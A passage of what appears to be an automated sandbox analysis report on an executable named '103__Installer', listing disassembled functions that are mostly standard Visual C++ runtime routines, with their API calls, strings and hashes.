                  • String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
                  • API String ID: 3117964792-798102604
                  • Opcode ID: 204be13a93052108983dbff74d8aa8fb9e33ef56634dcabd611a731fda43a3cc
                  • Instruction ID: c1e91eb1a16fcd87ac6129f22a5a319cb5c288f5b9088cf785d2dbea91a41d75
                  • Opcode Fuzzy Hash: 204be13a93052108983dbff74d8aa8fb9e33ef56634dcabd611a731fda43a3cc
                  • Instruction Fuzzy Hash: 77F0247264C2102BDB2039295C819AB7ADCCB80B24F25C4FAF67D97201ED21AC0192A9
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B71A6B
                  • std::_Lockit::_Lockit.LIBCPMT ref: 00B71A7D
                  • std::exception::exception.LIBCMT ref: 00B71AB4
                    • Part of subcall function 00B73C6B: std::exception::_Copy_str.LIBCMT ref: 00B73C86
                  • __CxxThrowException@8.LIBCMT ref: 00B71AC9
                    • Part of subcall function 00B7450C: RaiseException.KERNEL32(?,?,00B713AC,?,?,?,?,?,00B713AC,?,00B8CCD8,00000000), ref: 00B7454E
                  • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00B71AD2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
                  • String ID: bad locale name
                  • API String ID: 446407826-1405518554
                  • Opcode ID: 06caa6fb5727c01779f625cb6025c0140ed41d8f2475315d2060f4047d2bb169
                  • Instruction ID: ac0bc6cc062376cf7a8b7941f3da4759ce3c0049b0af74a422f32ec35d28eda9
                  • Opcode Fuzzy Hash: 06caa6fb5727c01779f625cb6025c0140ed41d8f2475315d2060f4047d2bb169
                  • Instruction Fuzzy Hash: 2B0161B2901744DECB21EFA9C4804DEFFF4BF14704B40C5AEE56993611C7749608CBA5
                  APIs
                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00B8D628,00000008,00B79777,00000000,00000000,?,?,00B7A8F0,00B74478,?,?,00B73C60,?,?,00B7101C), ref: 00B79680
                  • __lock.LIBCMT ref: 00B796B4
                    • Part of subcall function 00B7B747: __mtinitlocknum.LIBCMT ref: 00B7B75D
                    • Part of subcall function 00B7B747: __amsg_exit.LIBCMT ref: 00B7B769
                    • Part of subcall function 00B7B747: EnterCriticalSection.KERNEL32(00000000,00000000,?,00B796B9,0000000D), ref: 00B7B771
                  • InterlockedIncrement.KERNEL32(?), ref: 00B796C1
                  • __lock.LIBCMT ref: 00B796D5
                  • ___addlocaleref.LIBCMT ref: 00B796F3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                  • String ID: KERNEL32.DLL
                  • API String ID: 637971194-2576044830
                  • Opcode ID: 8251f5613c58d8d8b5dbb5eab963571338126aa33bae9518ea69d8ee7da82358
                  • Instruction ID: c6eecce5b237411fb4c00b0cc165a5388734637bd2a2476d8cb51dd53c4c553c
                  • Opcode Fuzzy Hash: 8251f5613c58d8d8b5dbb5eab963571338126aa33bae9518ea69d8ee7da82358
                  • Instruction Fuzzy Hash: B7016D71840701AFDB24AF65C845749FBF0AF80324F20898EE5AE972B1CBB4A944CF15
                  APIs
                  • __CreateFrameInfo.LIBCMT ref: 00B779BB
                    • Part of subcall function 00B74842: __getptd.LIBCMT ref: 00B74850
                    • Part of subcall function 00B74842: __getptd.LIBCMT ref: 00B7485E
                  • __getptd.LIBCMT ref: 00B779C5
                    • Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
                    • Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC
                  • __getptd.LIBCMT ref: 00B779D3
                  • __getptd.LIBCMT ref: 00B779E1
                  • __getptd.LIBCMT ref: 00B779EC
                  • _CallCatchBlock2.LIBCMT ref: 00B77A12
                    • Part of subcall function 00B748E7: __CallSettingFrame@12.LIBCMT ref: 00B74933
                    • Part of subcall function 00B77AB9: __getptd.LIBCMT ref: 00B77AC8
                    • Part of subcall function 00B77AB9: __getptd.LIBCMT ref: 00B77AD6
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  • Opcode ID: daec75003296c1287732eec78bc6ad0d9f581bdf62f8425779039ca6f7fb91ae
                  • Instruction ID: 957706eb1144b67bbc201edede6754cb5980b14144a46e2b1b8e65d252b6d3ac
                  • Opcode Fuzzy Hash: daec75003296c1287732eec78bc6ad0d9f581bdf62f8425779039ca6f7fb91ae
                  • Instruction Fuzzy Hash: AC11B4B5C10209DFDF00EFA4D445AADBBF0FF08325F1584AAE828A7251DB389A159F55
                  APIs
                  • __getptd.LIBCMT ref: 00B7D1C0
                    • Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
                    • Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC
                  • __amsg_exit.LIBCMT ref: 00B7D1E0
                  • __lock.LIBCMT ref: 00B7D1F0
                  • InterlockedDecrement.KERNEL32(?), ref: 00B7D20D
                  • _free.LIBCMT ref: 00B7D220
                  • InterlockedIncrement.KERNEL32(01B01650), ref: 00B7D238
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                  • String ID:
                  • API String ID: 3470314060-0
                  • Opcode ID: e9f8e8675e00366ab9ca322c24b410a40c426748f39c8cc1dc2486e6dc5ee9ed
                  • Instruction ID: 02f386761a3cc796af4f5ed11fec87390a044b3a3354981895e9fd26147afe75
                  • Opcode Fuzzy Hash: e9f8e8675e00366ab9ca322c24b410a40c426748f39c8cc1dc2486e6dc5ee9ed
                  • Instruction Fuzzy Hash: D7016132D016119BCB21AF24D80576DB7F0EF447A2F15C095E828B76A1CB34AE42DB95
                  APIs
                  • __EH_prolog.LIBCMT ref: 00B71AF0
                  • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00B71B04
                    • Part of subcall function 00B732DA: _setlocale.LIBCMT ref: 00B732EC
                  • _free.LIBCMT ref: 00B71B12
                    • Part of subcall function 00B74452: HeapFree.KERNEL32(00000000,00000000,?,00B73C60,?,?,00B7101C), ref: 00B74468
                    • Part of subcall function 00B74452: GetLastError.KERNEL32(?,?,00B73C60,?,?,00B7101C), ref: 00B7447A
                  • _free.LIBCMT ref: 00B71B24
                  • _free.LIBCMT ref: 00B71B36
                  • _free.LIBCMT ref: 00B71B48
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                  • String ID:
                  • API String ID: 770894815-0
                  • Opcode ID: 917d030b3080225047c4a272afa41a23f7d2abde712768bcfa860fea293c431e
                  • Instruction ID: 82351a30b76a6629b15e1397900d1f6375e13dd3f71743bce157452b59d8e7fb
                  • Opcode Fuzzy Hash: 917d030b3080225047c4a272afa41a23f7d2abde712768bcfa860fea293c431e
                  • Instruction Fuzzy Hash: 41010C716106019BDB24AB6DD906B9BB3E8FB00726F10C99EE07AD6681DB78D9049A60
                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00B7155A
                  • std::exception::exception.LIBCMT ref: 00B7157C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Exception@8Throwstd::exception::exception
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 3728558374-1866435925
                  • Opcode ID: 9167f44009abc4602a71bb2d8c0da11964cbd1e222ce86e714ff33983d4a898e
                  • Instruction ID: 0165af5371be21f125b15ed0d6d353056e74439390cf4ff082293e52fc46758f
                  • Opcode Fuzzy Hash: 9167f44009abc4602a71bb2d8c0da11964cbd1e222ce86e714ff33983d4a898e
                  • Instruction Fuzzy Hash: B4015EB2800208AACB48EFAD8447AAD7BE49BA0714B14C49AA52B9B112D774DA05CF71
                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 00B77D53
                    • Part of subcall function 00B77CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00B77CE4
                  • _UnwindNestedFrames.LIBCMT ref: 00B77D6A
                  • ___FrameUnwindToState.LIBCMT ref: 00B77D78
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: csm$csm
                  • API String ID: 2163707966-3733052814
                  • Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                  • Instruction ID: b4e7f0d00184aced460dcdb1d06626a68de26b8ed4c7c96f95b8ed152d8cbb8a
                  • Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
                  • Instruction Fuzzy Hash: D901F671045109BBDF22AF51CC45EAA7FAAFF58350F108064FD2D55121DB3299B1DBA1
                  APIs
                  • _malloc.LIBCMT ref: 00B7DE06
                    • Part of subcall function 00B7729E: __FF_MSGBANNER.LIBCMT ref: 00B772B7
                    • Part of subcall function 00B7729E: __NMSG_WRITE.LIBCMT ref: 00B772BE
                    • Part of subcall function 00B7729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00B763C9,00000000,00000001,00000000,?,00B7B6D2,00000018,00B8D718,0000000C,00B7B762), ref: 00B772E3
                  • _free.LIBCMT ref: 00B7DE19
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: AllocateHeap_free_malloc
                  • String ID:
                  • API String ID: 1020059152-0
                  • Opcode ID: 7f121efae6833e433cb73989c251e201d9f680bcbb9bc22f01a41d7e84b27355
                  • Instruction ID: 2181c709cb4e9236855ac29f4020f4e552362a11a4472d59be79fac648891204
                  • Opcode Fuzzy Hash: 7f121efae6833e433cb73989c251e201d9f680bcbb9bc22f01a41d7e84b27355
                  • Instruction Fuzzy Hash: D1119432808615EACF623B74AC0466E37E5DFA43E0B24C5A5F87EAF250DF3088419652
                  APIs
                  • __getptd.LIBCMT ref: 00B7D941
                    • Part of subcall function 00B7979C: __getptd_noexit.LIBCMT ref: 00B7979F
                    • Part of subcall function 00B7979C: __amsg_exit.LIBCMT ref: 00B797AC
                  • __getptd.LIBCMT ref: 00B7D958
                  • __amsg_exit.LIBCMT ref: 00B7D966
                  • __lock.LIBCMT ref: 00B7D976
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00B7D98A
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                  • String ID:
                  • API String ID: 938513278-0
                  • Opcode ID: 8cd5ddcc1b7f5f1304f51326fd663e30bc38bfe225245bb1b9a7d50bac015c8b
                  • Instruction ID: 91f0372d09b42feb2aba55f4f6a89c3485871cfddac68f1beace7a38c5ac4d1a
                  • Opcode Fuzzy Hash: 8cd5ddcc1b7f5f1304f51326fd663e30bc38bfe225245bb1b9a7d50bac015c8b
                  • Instruction Fuzzy Hash: 14F09A329443109ADB65BB689803B5E77F0EF407B0F11C2CAF23DBB1D2CB2449008B56
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 59d5494874f2f65703eeddfcf99a43b39fb131de87f3f4bc868b54f2c296f6f3
                  • Instruction ID: 52d85ca436f335c809ff8007c884dce71c85fadc3628989396ea093e72bb8fd2
                  • Opcode Fuzzy Hash: 59d5494874f2f65703eeddfcf99a43b39fb131de87f3f4bc868b54f2c296f6f3
                  • Instruction Fuzzy Hash: A25192759016099FCF18DFA8C5C18AEB7F9FF18314B2049AEE16AA7251D770EE44CB20
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                  • String ID:
                  • API String ID: 2782032738-0
                  • Opcode ID: cd2d74426b4df6de844ced7a9a3a866c1defe329a49c13b0862e98ce2aafceaf
                  • Instruction ID: 6aa45bc1d93945e126f2abea52cae564cec4e37b3c8c93214b4c428c01b7cf64
                  • Opcode Fuzzy Hash: cd2d74426b4df6de844ced7a9a3a866c1defe329a49c13b0862e98ce2aafceaf
                  • Instruction Fuzzy Hash: C8419371A00F049FDB349F658885A9EBBF6EF90360F24C5A9E47E97180D7B1EE518B40
                  APIs
                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B83C19
                  • __isleadbyte_l.LIBCMT ref: 00B83C4C
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00B83C7D
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00B83CEB
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 5e4c594ff40a8221d87b2da245a09c57767a6c252f21315a53c3d0cb8bc9fdf4
                  • Instruction ID: dfb7c0430586a5cc86ff6f056e7fad2ecf3a5eca08d7260ecdea822719173c2b
                  • Opcode Fuzzy Hash: 5e4c594ff40a8221d87b2da245a09c57767a6c252f21315a53c3d0cb8bc9fdf4
                  • Instruction Fuzzy Hash: 40319E31A04386EFDB20EF64C894AA97BE5FF01B10F1585E9E466AB1A1D730DE80DF50
                  APIs
                  • _memset.LIBCMT ref: 00B7DB33
                  • GetStringTypeW.KERNEL32(?,?,00000000,?,?,00000000), ref: 00B7DB56
                  • __freea.LIBCMT ref: 00B7DB60
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: StringType__freea_memset
                  • String ID:
                  • API String ID: 2013851047-0
                  • Opcode ID: 407f5605f6789827d3e535dedcf8b9b9e35f6fe4ce783cf7042c10268e0eccaf
                  • Instruction ID: 7d7ea97ec14fac1f6357f00c4a5b2258316d3bbd161eb74ec8a112c3458119cf
                  • Opcode Fuzzy Hash: 407f5605f6789827d3e535dedcf8b9b9e35f6fe4ce783cf7042c10268e0eccaf
                  • Instruction Fuzzy Hash: 0B11D07260020AAEDF116F64DC81AAE3BF9EF04390F1584A6FA29D6291DB30DD519760
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                  • Instruction ID: 07ea7af6f67f7d7cc0a554a2965a31579b71ac1a15b23bd1c64850513cdc5b5e
                  • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                  • Instruction Fuzzy Hash: A7117E7604014ABBCF165E84CC49CEE3FA2FF58390B588495FA2C69430C737C9B1AB81
                  APIs
                  • _malloc.LIBCMT ref: 00B744A6
                    • Part of subcall function 00B7729E: __FF_MSGBANNER.LIBCMT ref: 00B772B7
                    • Part of subcall function 00B7729E: __NMSG_WRITE.LIBCMT ref: 00B772BE
                    • Part of subcall function 00B7729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00B763C9,00000000,00000001,00000000,?,00B7B6D2,00000018,00B8D718,0000000C,00B7B762), ref: 00B772E3
                  • std::exception::exception.LIBCMT ref: 00B744DB
                  • std::exception::exception.LIBCMT ref: 00B744F5
                  • __CxxThrowException@8.LIBCMT ref: 00B74506
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                  • String ID:
                  • API String ID: 615853336-0
                  • Opcode ID: 6d2032b5329793195cadd350dc2a5d35fdbb32ef74147a2f4069c492235d500c
                  • Instruction ID: 5b371513f8bc58434628943230fa71d29a9ae93a9aba4d3aaa89ee052c4d00d6
                  • Opcode Fuzzy Hash: 6d2032b5329793195cadd350dc2a5d35fdbb32ef74147a2f4069c492235d500c
                  • Instruction Fuzzy Hash: D1F0F972544209AFDF40FB68DC06AAD3BE9EB40B14F1480D5F82CA61A2CF718A40EB41
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00B735CA
                    • Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738C1
                    • Part of subcall function 00B738AC: __CxxThrowException@8.LIBCMT ref: 00B738D6
                    • Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738E7
                    • Part of subcall function 00B7225E: std::_Xinvalid_argument.LIBCPMT ref: 00B7226F
                  • _memmove.LIBCMT ref: 00B73625
                  Strings
                  • invalid string position, xrefs: 00B735C5
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                  • String ID: invalid string position
                  • API String ID: 3404309857-1799206989
                  • Opcode ID: c2936b74c0ac110a29ac002964baae41312c2d3dfc4f47d047a744290adccabd
                  • Instruction ID: f5d4498e38be89b16e44abe0d4c9f365b74527fc4e658730f1702320314f3aca
                  • Opcode Fuzzy Hash: c2936b74c0ac110a29ac002964baae41312c2d3dfc4f47d047a744290adccabd
                  • Instruction Fuzzy Hash: 5B119831308210ABDB249F19C881A66B3E5EB94F10F10899DF97E87391D771DB01E795
                  APIs
                  • std::_Xinvalid_argument.LIBCPMT ref: 00B72156
                    • Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738C1
                    • Part of subcall function 00B738AC: __CxxThrowException@8.LIBCMT ref: 00B738D6
                    • Part of subcall function 00B738AC: std::exception::exception.LIBCMT ref: 00B738E7
                  • _memmove.LIBCMT ref: 00B7218F
                  Strings
                  • invalid string position, xrefs: 00B72151
                  Memory Dump Source
                  • Source File: 00000000.00000002.3333884766.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                  • Associated: 00000000.00000002.3333865655.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333905019.0000000000B89000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333921475.0000000000B8F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.3333937835.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b70000_103__Installer.jbxd
                  Similarity
                  • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                  • String ID: invalid string position
                  • API String ID: 1785806476-1799206989
                  • Opcode ID: 9628e189a54d8c264580b5f2d348c28bd2eb8c6f245aeb53045d8e05f4652b0f
                  • Instruction ID: c213582b16de008578ee79958d4446cff7f53f0103f8bada62ccad088c36c9b5
                  • Opcode Fuzzy Hash: 9628e189a54d8c264580b5f2d348c28bd2eb8c6f245aeb53045d8e05f4652b0f
                  • Instruction Fuzzy Hash: F90192313042519BD7248F68DCC086BB3F6FBC071076489BDE6A997B45DB70ED4583A4
                  APIs
                    • Part of subcall function 00B74895: __getptd.LIBCMT ref: 00B7489B
                    • Part of subcall function 00B74895: __getptd.LIBCMT ref: 00B748AB
